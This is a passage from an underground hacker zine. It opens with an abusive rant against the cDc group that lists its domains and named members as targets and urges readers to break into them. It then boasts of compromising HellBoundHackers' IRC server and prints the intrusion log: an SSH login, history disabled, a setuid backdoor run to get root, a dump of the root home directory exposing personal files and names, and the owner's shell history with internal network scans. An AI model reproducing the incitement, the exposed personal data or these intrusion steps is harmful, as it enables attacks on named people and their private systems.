stop calling yourselves hackers to gain hits, fuckers. From 1984 until something like 1998 they did hardly anything except write these shitty articles, recruit new members, and suck some media cock. This is the one exception: in the early 1990s they ran hohocon. hohocon had very limited amounts of technical content, and it wasn't supplied by cDc. Think of it as a bunch of fat losers getting together to bumfuck each other. What you need to understand is that Ratte' is basically an emo loser who blogged for twenty years. Over time he has recruited other media cock suckers, most of which have only lasted a few years. Fools that they are, their most popular work will forever be what they released with cDc, and it will be considered made by cDc, with them mentioned only as an afterthought. Not coincidentally, the reason their shitty work was popular to begin with was because it was released by cDc. "I think with our longevity we've worked towards finding a new way to relate to technology and the emerging global structure." <- you mean you have worked towards recruiting new members who at least know how to use some new technology. What is the one bona-fide highlight of cDc's technical career? It was when they wrote Back Orifice and Back Orifice 2000 and spoke at two Defcons about them. Congratulations, you wrote a shitty backdoor for Windows 95/98 (not like 98 was a big technical advancement over 95) years after win95 had been released. According to ISS, they used a two byte encryption key (http://xforce.iss.net/xforce/alerts/id/advise5) with a known plaintext. Seriously, why not just rot13 it? Stupid wankers. Apparently cDc losers continue to implement encryption poorly. Yet BO was quite popular. All because cDc talked it up. Real hackers were writing much better backdoors, trivially, and keeping them to themselves. Real hackers actually had backdoors that weren't designed for grandma's PC. And Defcon supported cDc in their bullshit game. BO was cDc's way of saying "look ma, we got a couple new members who know this programming thing. we're still relevant!" The other programs by cDc since then have been just as shitty. Bollocks I say. cDc has never, ever, produced anything good. The combined technical production of all cDc members, ever, during their time at cDc, is easily comparable to a year's worth of work by a small "script kiddie" group, despite all the time that kiddie group would have invested actually hacking. cDc also has this hacktivismo thing, which is also a piece of shit that hasn't accomplished anything. But it sure has produced a lot of rhetoric, adding more shit to the fan, and has a few members whose names can be added to the cDc shitlist. They have a "ninja strike force", which is just another bullshit name for cDc members. See, cDc wants to throw a bunch of names at you, like cDc, cDc communications, ninja strike force, and hacktivismo, to make it look like they are involved in a lot of stuff. Now of all things they have integrated psg. They get to use him as a wank vehicle to spread their name. He does likewise. It's a gay publicity fest. psg gets to talk about Eve (lame Whitedust program) on the NSF blog, despite the fact that he didn't write it. Literally using cDc to sell a product that nobody in cDc made. These guys spend their days forming myspace blog posts. It is a bloody group of myspace users who tell the world that they are one of the oldest hacking groups, and use the number 1984 as their evidence. Please start owning cDc assets or individuals. We want cDc to just end. They are worse than 2600 (and we would probably write a CF0 on 2600 if we hadn't owned them so much already). == Targets == Some domains to own: cultdeadcow.com hacktivismo.com ninjastrikeforce.com bo2k.com http://www.cultdeadcow.com/?p=proj # Good list to work on! http://www.cultdeadcow.com/?p=other # Another list to work on! Here is an incomplete list of people to own (gathered from cDc websites for your convenience): (here be older members) Grandmaster Ratte' Obscure Images THE NIGHTSTALKER - gis.net/~cht Count Zero - zero.hastypasty.net Mudge Oxblood Ruffin - oxblood.net Sir Dystic Dildog Dark Sorcerer (here be the blogging crew) Myles Long - http://www.rezident.net/~myles/ xxxclusive - http://the3rd2nd.com/ Hella Kitty assrabbit Javaman - http://www.philtered.net/~adam/ Mixter - mixter.void.ru Lord Digital - http://www.phantom.com/~digital/ MiB Delchi el - http://el.blogsport.de/ Punkle Jones trammel ladyaya valsmith - offensivecomputing.net dannyquist Comrade Smack (here be current NSF bitches not listed above) psg DaYuM Devolish Diskrez Elliot Pank Flack fj KEMiKAL Lizzie Borden Omnininja oxycolton Phrenchtoast RaD Man Voice Of Anarchy Biot Binary Chamuco (here be others) anyone on IRC anyone on their forums I excluded a few older members. I get the feeling that they knew how lame it was, and have moved on. Ratte' just finds it convenient to use their names to try to support his credibility. But we don't really know them, so do what you would like. There are lots of reasons to own any of these individuals. Many are morons. Many have never accomplished anything. The few who have written code for cDc have done so poorly. Some are whitehat scenewhores. If you can't decide, how about we offer suggestions: Ratte' - Start at the top and own this noob. He knows what he is, but he won't stop lying. Mixter - The current "Look, we have a real hacker!" member. See his Wikipedia entry! Comrade Smack - The current "I'm fresh and exciting!" member. psg - why not? == Motivation Time == I hear a lot of rhetoric about taking back the scene. Taking it back from no-talent whitehats. And I'm all for that - we even did some of that in this zine. But come on, nobody is claiming such a big piece of the hacker history cake as cDc is. You want to take back the scene? Well, do it. Wipe these fuckers off the internet. It's easy and it can be seen by far more people than someone reading a zine or someone who notices a whitehat blog disappear. There are more than enough targets to go around. So pick one and fucking 0wn it. Here is a motivational quote from some friends of ours: Blend in. Get trusted. Trust nobody. Own everybody. Disclose nothing. Destroy everything. Take back the scene. EOCF0 );} sub Hellboundhackers { ;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOHELLBOUNDHACKERS' There comes a time for every civilization to come to an end. That end could be a series of violent conflicts that come in waves, or a slow sputtering out of interest until it's effectively dead. Occasionally, a community that's slow to realize that it's out-modded, out-dated, out-gunned and out-classed has to be helped along to its eventual demise. Such was the case for HellBoundHackers (HBH). HBH is your typical lamer site. They have a forum with over 20,000 registered users, lots of stupid articles that are pointless and don't convey any new information. They also have your typical administrators that think themselves to be elite hackers. In this case, despite the name, they're staunchly whitehat advocating "ethical" hacking. However, MrCheese and his posse also regard themselves as hacktivists and the self proclaimed saviours of the Internet. They hack websites whose content they disagree with and post a defacement. Hmm... does anyone else see the contradiction here? They also advocate practices such as full-disclosure, and yet they claim to hate script kiddies. All their "hacking" articles always talk about how you should code your own exploits. Too bad none of their members has a clue about how to do that. The members over on HBH also have the typical narrow whitehat perspective. Anyone who actually hacks is a script kiddie, regardless of their actual skill level. This should come as a shock to them... So, in accordance with the rules of pr0j3kt m4yh3m, it has been decided that HBH needs to die. This comes for all communities; it is inevitable. You can try to fight it but you will lose. After all, you don't know us, you only know of us. And as Raster so bravley said: 08:22 <~ShiroTenryu> I dare you all, hack my network, so you can prove a point! We'll take that dare Raster. Now, let's take a look at their IRC network: $ ssh -p 443 deadlyacid@rasterized.net deadlyacid@rasterized.net's password: Last login: Fri Apr 20 14:15:58 2007 from Z.F.0 [deadlyacid@localhost ~]$ unset HISTFILE ; unset SAVEHIST [deadlyacid@localhost ~]$ uname -a Linux localhost.localdomain 2.6.20 #1 Mon May 21 23:20:40 EDT 2007 i686 i686 i386 GNU/Linux [deadlyacid@localhost ~]$ cat /etc/redhat-release Fedora Core release 4 (Stentz) [deadlyacid@localhost ~]$ w 17:10:16 up 3 days, 21:39, 1 user, load average: 0.02, 0.02, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT deadlyac pts/0 Z.F.0 17:09 0.00s 0.03s 0.00s w [deadlyacid@localhost ~]$ # how boring... [deadlyacid@localhost ~]$ ls -alh total 48K drwxr-xr-x 2 deadlyacid deadlyacid 4.0K Apr 7 21:52 . drwxr-xr-x 26 strayfe strayfe 4.0K May 14 04:32 .. -rw------- 1 deadlyacid deadlyacid 2 Apr 7 21:55 .bash_history -rw-r--r-- 1 deadlyacid deadlyacid 24 Sep 13 2006 .bash_logout -rw-r--r-- 1 deadlyacid deadlyacid 191 Sep 13 2006 .bash_profile -rw-r--r-- 1 deadlyacid deadlyacid 124 Sep 13 2006 .bashrc -rwsr-xr-x 1 root root 4.8K Sep 13 2006 .cshrc -rw-r--r-- 1 deadlyacid deadlyacid 120 Sep 13 2006 .gtkrc -rw------- 1 root root 612 Apr 7 21:50 .viminfo -rw-r--r-- 1 deadlyacid deadlyacid 658 Sep 13 2006 .zshrc [deadlyacid@localhost ~]$ cat .bash_history w [deadlyacid@localhost ~]$ # Let's have some fun. :) [deadlyacid@localhost ~]$ id uid=508(deadlyacid) gid=508(deadlyacid) groups=508(deadlyacid) [deadlyacid@localhost ~]$ ./.cshrc [root@localhost ~]# unset HISTFILE ; unset SAVEHIST [root@localhost ~]# id uid=0(root) gid=0(root) groups=508(deadlyacid) [root@localhost ~]# cd ~root [root@localhost root]# ls -alh total 219M drwxr-x--- 36 root root 4.0K May 6 18:14 . drwxr-xr-x 26 root root 4.0K Jun 5 18:30 .. -rw-r--r-- 1 root root 14M Oct 24 2006 128 Bit Wep Cracking With Injection!.swf -rw-r--r-- 1 root root 1.4M Oct 18 2006 59743444-O.jpg -rw-r--r-- 1 root root 293K Oct 18 2006 all-filters.zip -rw------- 1 root root 1.6K Jul 4 2006 anaconda-ks.cfg -rwxr-xr-x 1 root root 5.6K Jul 30 2006 a.out -rw-r--r-- 1 root root 106K Oct 18 2006 ascgen2-0.7.1.zip -rw-r--r-- 1 root root 631K Oct 18 2006 background_1024x768.png -rw-r--r-- 1 root root 470K Oct 18 2006 background.png -rw------- 1 root root 14K Jun 7 17:36 .bash_history -rw-r--r-- 1 root root 24 Dec 3 2004 .bash_logout -rw-r--r-- 1 root root 241 Jan 24 23:00 .bash_profile -rw-r--r-- 1 root root 176 Dec 3 2004 .bashrc -rw-r--r-- 1 root root 408K Oct 18 2006 body.ai drwxr-xr-x 2 root root 4.0K Aug 10 2006 config -rw-r--r-- 1 root root 8.0K Oct 18 2006 Constitution.txt -rw-r--r-- 1 root root 100 Dec 3 2004 .cshrc -rw-rw-r-- 1 Raster Raster 1.8M Jul 4 2006 curl-7.15.4.tar.gz drwxr-xr-x 2 root root 4.0K Nov 3 2006 Desktop -rw------- 1 root root 24 Feb 4 03:10 .dmrc drwxr-xr-x 5 1001 wheel 4.0K Oct 13 2006 dsniff-2.3 -rw-r--r-- 1 root root 580K May 27 2002 dsniff-2.3.tar -rw-r--r-- 1 root root 124K May 27 2002 dsniff-2.3.tar.gz.1 -rw-r--r-- 1 root root 468K Oct 18 2006 Effects.ai -rw-r--r-- 1 root root 62K Oct 18 2006 Effects.png drwxr-x--- 2 root root 4.0K Jul 4 2006 .eggcups drwx------ 2 root root 4.0K Jan 2 18:46 .elinks -rw-r--r-- 1 root root 280K Oct 18 2006 epsxe160.zip -rw------- 1 root root 16 Sep 11 2006 .esd_auth drwxrwxrwx 19 Raster Raster 12K Sep 2 2006 ethereal-0.99.0 -rw-r--r-- 1 root root 11M Oct 18 2006 framework-2.6.exe -rw-r--r-- 1 root root 9.2M Oct 18 2006 framework-3.0-beta-1.exe drwx------ 4 root root 4.0K Mar 21 09:38 .gconf drwx------ 2 root root 4.0K Mar 21 09:41 .gconfd drwxr-xr-x 7 root root 4.0K Feb 27 04:29 gd-2.0.34 -rw-r--r-- 1 root root 3.6M Feb 6 19:41 gd-2.0.34.tar drwxr-xr-x 21 root root 4.0K Oct 5 2006 .gimp-2.2 drwxr-xr-x 3 root root 4.0K Jul 4 2006 .gnome drwx------ 9 root root 4.0K Feb 24 14:14 .gnome2 drwx------ 2 root root 4.0K Jul 4 2006 .gnome2_private -rw-r--r-- 1 root root 476K Aug 12 2006 grub.iso drwxr-xr-x 2 root root 4.0K Jul 4 2006 .gstreamer-0.8 -rw-r--r-- 1 root root 120 May 22 2005 .gtkrc -rw-r--r-- 1 root root 128 Jul 4 2006 .gtkrc-1.2-gnome2 -rw-r--r-- 1 root root 688K Oct 18 2006 hldsupdatetool.exe -rw-rw-r-- 1 Raster Raster 6.0M Jul 4 2006 httpd-2.2.2.tar.gz -rw------- 1 root root 2.3K Feb 24 14:14 .ICEauthority -rw-r--r-- 1 root root 97K Oct 18 2006 img001.jpg -rw-r--r-- 1 root root 16M Oct 18 2006 Immigration3.wmv -rw-r--r-- 1 root root 33K Oct 18 2006 IN CONGRESS.doc -rw-r--r-- 1 root root 62K Jul 4 2006 install.log -rw-r--r-- 1 root root 6.1K Jul 4 2006 install.log.syslog -rw-r--r-- 1 root root 41K Oct 18 2006 Internship quiz .doc -rw-r--r-- 1 root root 1.7K Jul 27 2006 invison_cookie.php drwx------ 2 root root 4.0K Jan 24 22:12 .irssi drwxr-xr-x 3 root root 4.0K Aug 12 2006 iso drwxr-xr-x 3 root root 4.0K Dec 7 2006 jtr -rw-r--r-- 1 root root 92K Jun 4 2005 kernel-module-ntfs-2.6.11-1.1369_FC4-2.1.22-0.rr.6.0.i686.rpm -rw-r--r-- 1 root root 59K Aug 10 2006 KeyGenerator.exe -rw-r--r-- 1 root root 35M Oct 18 2006 KNOPPIX_V5.0.1CD-2006-06-01-EN.iso -rw-r--r-- 1 root root 1.7M Oct 18 2006 KNOPPIX_V5.0.1DVD-2006-06-01-EN.iso drwx------ 3 root root 4.0K Jul 4 2006 .local -rwxr-xr-x 1 root root 331 Jan 25 11:01 .login -rwxr-xr-x 1 root root 5.5K Jul 30 2006 lptout -rw-r--r-- 1 root root 1.2K Jul 30 2006 lptout.c -rw-r--r-- 1 root root 1.2K Jul 30 2006 lptout.c~ drwx------ 3 root root 4.0K Jul 4 2006 .metacity drwxr-xr-x 3 root root 4.0K Dec 25 05:20 milk drwxr-xr-x 3 root root 4.0K Jul 16 2006 .mozilla -rwxr-xr-x 1 root root 996 Jul 26 2006 msn_bot.php -rw-r--r-- 1 root root 19M Jul 4 2006 mysql-5.0.22.tar.gz -rw-r--r-- 1 root root 2.3M Jan 22 22:59 mysql_backup.sql -rw------- 1 root root 491 Feb 9 16:10 .mysql_history -rw-rw-r-- 1 Raster Raster 41M Jul 4 2006 mysql-max-5.0.22-linux-i686-glibc23.tar.gz drwxr-xr-x 3 root root 4.0K Jul 4 2006 .nautilus drwxr-xr-x 2 root root 4.0K Nov 27 2006 .ncftp -rw-r--r-- 1 root root 333K Oct 18 2006 netsvwrap.msi -rw-r--r-- 1 root root 1.1M Oct 18 2006 nmap-4.11-setup.exe -rw-r--r-- 1 root root 80K Oct 18 2006 OggMux-0.9.5.1.zip drwxr-xr-x 3 root root 4.0K Sep 11 2006 .openoffice.org2.0 -rw-rw-r-- 1 Raster Raster 7.8M Jul 4 2006 php-5.1.4.tar.gz drwxr-xr-x 9 4327 409 4.0K Jan 2 18:53 pine4.64 -rw-r--r-- 1 root root 4.1M Jan 2 18:46 pine4.64.tar.gz -rw-r--r-- 1 root root 635K Oct 18 2006 Pj64 Build 52 2001-12-22.zip -rw-r--r-- 1 root root 4.5K Oct 18 2006 podcast.GRF -rw-r--r-- 1 root root 15M Oct 18 2006 podcast.ogg -rw-r--r-- 1 root root 24K Oct 18 2006 preamble words.doc -rw-r--r-- 1 root root 741K Oct 18 2006 prea.wma -rw-r--r-- 1 root root 454K Oct 18 2006 privoxy_setup_3_0_5.exe -rw-r--r-- 1 root root 736K Oct 18 2006 Rasterized_background.ai -rw-r--r-- 1 root root 544K Oct 18 2006 Rasterized_background.png -rw------- 1 root root 15K Oct 30 2006 .recently-used drwxr-xr-x 2 root root 4.0K Jan 4 21:57 reg -rw------- 1 root root 497 Jul 4 2006 .rhn-applet.conf -rw-r--r-- 1 root root 449K Oct 18 2006 Rose.ai -rw-r--r-- 1 root root 609K Oct 18 2006 saminside.zip -rw-r--r-- 1 root root 1019K Oct 18 2006 sc32r240.exe -rw-r--r-- 1 root root 3.1K Oct 18 2006 SCHOLARSHIPADDRESSES.xls -rw-r--r-- 1 root root 322 Jul 30 2006 server.php drwxr-xr-- 6 root root 4.0K Jul 4 2006 serverutils -rw-r--r-- 1 root root 400K Oct 18 2006 Shannon_Kliffmueller_Brush.ai -rw-r--r-- 1 root root 39K Oct 18 2006 Shannon_Kliffmueller_test1.doc -rw-r--r-- 1 root root 4.8K Aug 13 2006 skeleton_botA.php -rw-r--r-- 1 root root 4.8K Aug 13 2006 skeleton_bot_line.php -rw-r--r-- 1 root root 4.8K Aug 13 2006 skeleton_bot^.php -rw-r--r-- 1 root root 4.8K Aug 13 2006 skeleton_bot_.php -rw-r--r-- 1 root root 4.8K Aug 13 2006 skeleton_bot.php -rw-r--r-- 1 root root 1.1M Oct 18 2006 smbat_win32bin_1.0.4.zip -rw-r--r-- 1 root root 167K Oct 18 2006 Sniphere.exe -rw-r--r-- 1 root root 271K Oct 18 2006 sockscapv235bynitrous_EvGnAzOrKoGxSlXc.zip -rw-r--r-- 1 root root 337 Jul 8 2006 somthing drwx------ 2 root root 4.0K Sep 1 2006 .ssh drwxr-x--- 2 root root 4.0K Apr 14 16:38 .steam -rw-r--r-- 1 root root 714K Oct 18 2006 SteamInstall.exe -rw-r--r-- 1 root root 5.7M Oct 18 2006 stick.fla -rw-r--r-- 1 root root 2.5K Oct 18 2006 stick.swf -rw-r--r-- 1 root root 129 Dec 3 2004 .tcshrc drwx------ 4 root root 4.0K Jul 16 2006 .thumbnails -rw-r--r-- 1 root root 183 Nov 27 2006 tmp -rw-r--r-- 1 root root 47 Oct 18 2006 Torrent downloaded from Demonoid.com.txt -rw-r--r-- 1 root root 1.1K Sep 30 2006 torrent.php drwx------ 6 root root 4.0K Oct 5 2006 .Trash -rw------- 1 root root 1.1K May 6 18:14 .viminfo -rw-r--r-- 1 root root 2.6M Oct 18 2006 Virtual Chess 64.7z -rw-r--r-- 1 root root 9.8K Oct 18 2006 VolumeC.txt -rw-r--r-- 1 root root 1.2M Oct 18 2006 vti.zip drwx------ 2 root root 4.0K Feb 24 17:26 .w3m drwxr-xr-x 2 root root 20K Nov 8 2006 win31d -rw-r--r-- 1 root root 622K Oct 18 2006 winima80.exe -rw-r--r-- 1 root root 8.7M Nov 8 2006 win.iso -rw-r--r-- 1 root root 980K Oct 18 2006 Xeon_10.rar drwxrwxrwx 11 1005 1005 4.0K Oct 30 2006 xine-lib-1.1.2 -rw-r--r-- 1 root root 625K Oct 18 2006 zsnesw142.zip [root@localhost root]# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.1 1740 576 ? Ss Jun05 0:01 init [3] root 2 0.0 0.0 0 0 ? SN Jun05 0:00 [ksoftirqd/0] root 3 0.0 0.0 0 0 ? S Jun05 0:00 [watchdog/0] root 4 0.0 0.0 0 0 ? S< Jun05 0:00 [events/0] root 5 0.0 0.0 0 0 ? S< Jun05 0:00 [khelper] root 6 0.0 0.0 0 0 ? S< Jun05 0:00 [kthread] root 56 0.0 0.0 0 0 ? S< Jun05 0:00 [kblockd/0] root 57 0.0 0.0 0 0 ? S< Jun05 0:00 [kacpid] root 133 0.0 0.0 0 0 ? S< Jun05 0:00 [ksuspend_usbd] root 136 0.0 0.0 0 0 ? S< Jun05 0:00 [khubd] root 138 0.0 0.0 0 0 ? S< Jun05 0:00 [kseriod] root 158 0.0 0.0 0 0 ? S Jun05 0:00 [pdflush] root 159 0.0 0.0 0 0 ? S Jun05 0:00 [pdflush] root 160 0.0 0.0 0 0 ? S< Jun05 0:00 [kswapd0] root 161 0.0 0.0 0 0 ? S< Jun05 0:00 [aio/0] root 327 0.0 0.0 0 0 ? S< Jun05 0:00 [kpsmoused] root 346 0.0 0.0 0 0 ? S< Jun05 0:00 [kmirrord] root 353 0.0 0.0 0 0 ? S< Jun05 0:00 [ksnapd] root 366 0.0 0.0 0 0 ? S< Jun05 0:02 [kjournald] root 817 0.0 0.1 1628 516 ? S /dev/null | less w screen ls -l /var/run/screen/ ls -la /var/run/screen/ ls -la `which screen` id screen -h screen -m screen -r screen -X id screen -wipe w screen -x screen -ls w talk Raster write Raster w write Raster mesg host irc.rmachine.net tty w ssh -l ircd localhost -p 443 -v ls -la ~ircd/.ssh ls -la ~ircd/.ssh/* ls -la ~ircd/.ssh/authorized_keys chmod uog+r ~ircd/.ssh/authorized_keys ls -la ~ircd/.ssh/authorized_keys cat ~ircd/.ssh/authorized_keys chown ircd ~ircd/.ssh/authorized_keys w w screen -ls w who tty ps x w ps auxww|less ls /net ls /mnt ls / ls /net/* ls /net ls /misc ls /net/localhost ls /net/localhost/ uname -a showmount -e smbclient -L localhost smbclient -L /sbin/arp -en /sbin/ifconfig screen -x w sudo su - ls ls /bin/bash ls -l /bin/bash ls -l /sbin/bash ls -l /tmp/bash ls -l /dev/bash locate bash find / -name "bash" find / -name "bash" 2>/dev/null ssh -l ircd localhost -p 443 -v w w mesg write Raster write Raster w w ps aux telnet localhost 6667 /sbin/ifconfig w mesg write Raster w w smbclient -L smbclient -L localhost arp -an /sbin/arp -an ping 192.168.1.100 ping 192.168.1.101 ping 192.168.1.102 ping 192.168.1.103 /sbin/arp -an smbclient -L -I 192.168.1.100 smbclient -L xp -I 192.168.1.100 smbclient -L xp -I 192.168.1.101 smbclient -L xp -I 192.168.1.102 smbclient -L xp -I 192.168.1.103 smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -UAdministrator smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -p smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -P smbclient -h smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -N smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -n MSHOME -N smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -n MSHOME smbclient \\\\KARENMAC\\C$ -I 192.168.1.102 -U Administrator -n WORKGROUP smbclient -l KARENMAC -I 192.168.1.102 -U Administrator -n WORKGROUP smbclient -l KARENMAC -I 192.168.1.103 smbclient -l KARENMAC -I 192.168.1.101 smbclient -L KARENMAC -I 192.168.1.101 smbclient -L KARENMAC -I 192.168.1.102 smbclient -L KARENMAC -I 192.168.1.103 smbclient -L KARENMAC -I 192.168.1.104 smbclient -L KARENMAC -I 192.168.1.105 smbclient -L KARENMAC -I 192.168.1.102 -U Administrator -n WORKGROUP smbclient -L KARENMAC -I 192.168.1.103 -U Administrator -n WORKGROUP smbclient -L KARENMAC -I 192.168.1.102 -U Administrator -n WORKGROUP w w w top ps auxww | grep Raster ps auxww | grep vnc echo $DISPLAY xconsole xconsole xconsole xhost xhost + xconsole who w ps auxww | grep Raster /usr/bin/gnome-session w w smbclient -L xp -I 192.168.1.102 smbclient -L xp -I 192.168.1.102 smbclient -L KARENMAC -I 192.168.1.102 -U Administrator -n WORKGROUP smbclient -L xp -I 192.168.1.100 smbclient -L xp -I 192.168.1.101 smbclient -L xp -I 192.168.1.102 smbclient -L xp -I 192.168.1.103 smbclient -L xp -I 192.168.1.104 smbclient -L xp -I 192.168.1.105 smbclient -L RASTERING -I 192.168.1.102 smbclient \\\\RASTERING\\C$ -I 192.168.1.102 smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator man smbclient smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -W mshome smbclient -L RASTERING -I 192.168.1.102 smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -W RASTERING smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -N RASTERING smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Administrator -n RASTERING smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U RASTERING\Administrator smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U RASTERING\Administrator -N smbclient -L RASTERING -I 192.168.1.102 smbclient \\\\RASTERING\\Shared -I 192.168.1.102 -U RASTERING\Administrator -N smbclient -L RASTERING -I 192.168.1.102 smbclient -h lpq lpstat smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Raster -n RASTERING smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Raster -n RASTERING smbclient \\\\RASTERING\\C$ -I 192.168.1.102 -U Raster -n RASTERING smbclient -L RASTERING -I 192.168.1.102 -U Raster smbclient \\\\RASTERING\\G$ -I 192.168.1.102 -U Administrator -W RASTERING smbclient \\\\RASTERING\\G$ -I 192.168.1.102 -U Administrator -W RASTERING -N smbclient \\\\RASTERING\\G$ -I 192.168.1.102 -U Administrator -W RASTERING -p smbclient \\\\RASTERING\\G$ -I 192.168.1.102 -U Administrator -W RASTERING -P smbclient \\\\RASTERING\\G$ -I 192.168.1.102 -U Administrator -W RASTERING -k smbclient -L RASTERING -I 192.168.1.102 -U Raster -k smbclient -L RASTERING -I 192.168.1.103 -U Raster -k smbclient -L RASTERING -I 192.168.1.101 -U Raster -k /sbin/arp -ae smbclient -L RASTERING -I 192.168.1.100 -U Raster -k ping -b 192.168.1.255 /sbin/arp -ae smbclient -L RASTERING -I 192.168.1.181 -U Raster telnet 192.168.1.181 telnet 192.168.1.181 80 telnet 192.168.1.181 6667 telnet 192.168.1.181 22 telnet 192.168.1.181 21 telnet 192.168.1.181 8000 telnet 192.168.1.181 8080 telnet 192.168.1.181 567 nmap nmap 192.168.1.181 nmap 192.168.1.181 -P0 nmap 192.168.1.0/24 nmap 192.168.1.0/24 lynx 192.168.1.104:8080 elinks 192.168.1.104:8080 nmap 192.168.1.0/24 elinks 192.168.1.102:8000 nmap 192.168.1.0/24 nmap 192.168.1.0/24 -v elinks 192.168.1.1 w xchat firefox mozilla man -k sniff ls /home ls /home/Raster/ ls -al /home/Raster/ ls -al /home/Raster/.mozilla/ ls -al /home/Raster/.mozilla/firefox/ less /home/Raster/.mozilla/firefox/profiles.ini ls -al /home/Raster/.mozilla/firefox/ ls -al /home/Raster/ echo $DISPLAY firefox echo $DISPLAY export DISPLAY=localhost:10.0 firefox ps x firefox export DISPLAY localhost:10.0 export DISPLAY=localhost:10.0 echo $DISPLAY export DISPLAY=localhost:10 firefox export DISPLAY=localhost:11 firefox xconsole xconsole xterm w write root w w w w w w w w w w w w broadcast /sbin/broadcast /usr/sbin/broadcast /usr/local/sbin/broadcast find / -name "*broad*" find / -name "*broad*" 2> /dev/null wall fg ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen screen -x ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen ls -l /usr/bin/screen screen -x screen -ls screen -e^Tt echo $DISPLAY XCHAT xchat echo $DISPLAY export DISPLAY=71.192.64.22:10 xchat export DISPLAY=71.192.64.22:0 xchat export DISPLAY=71.192.64.22:10 xchat export DISPLAY=71.192.64.22:0.2 xchat screen -x w who mozilla ls ls Incoming/ cd Incoming/ id sudo su - cat /etc/sudoers cat /etc/ssh/sshd_config cat /etc/ssh/ssh_config ls ls -l ls -la xdpyinfo xterm w ps auxww | grep irc w dmesg cat /proc//interrupts /sbin/ifconfig cat /proc/acpi/video/ ls /proc/acpi/video/ cat /proc/acpi/info cat /proc/acpi/button/power/PWRF/info cat /proc/acpi/button/sleep/SLPB/info cat /proc/devices cat /proc/irq/11/radeon\@pci\:0000\:00\:09.0/ cat /proc/misc dmesg | grep eth0 lsmod /sbin/lsmod uname -a dmesg | grep -i ra dmesg | grep -i video dmesg | grep - rade dmesg | grep -i rade dmesg | grep xrm dmesg | grep drm dmesg | grep 200 dmesg | grep 200 ps auxww | grep X passwd w ps auxww|grep astrer ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps 